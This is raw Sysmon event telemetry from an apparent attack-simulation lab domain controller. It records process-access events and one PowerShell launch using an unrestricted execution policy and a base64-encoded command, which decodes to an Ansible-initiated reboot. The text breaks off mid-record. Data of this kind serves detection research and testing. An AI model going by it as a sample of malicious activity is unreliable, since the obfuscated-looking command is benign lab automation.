10341000x8000000000000000521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.497{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8E20-6005-D302-00000000A201}32924108C:\Windows\system32\conhost.exe{59A5CD1D-8E21-6005-D702-00000000A201}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E21-6005-D702-00000000A201}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8E21-6005-D602-00000000A201}41324868C:\Windows\system32\cmd.exe{59A5CD1D-8E21-6005-D702-00000000A201}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.485{59A5CD1D-8E21-6005-D702-00000000A201}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E20-6005-E7C2-100000000000}0x10c2e70HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E21-6005-D602-00000000A201}4132C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0A 10341000x8000000000000000507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8E20-6005-D302-00000000A201}32924108C:\Windows\system32\conhost.exe{59A5CD1D-8E21-6005-D602-00000000A201}4132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 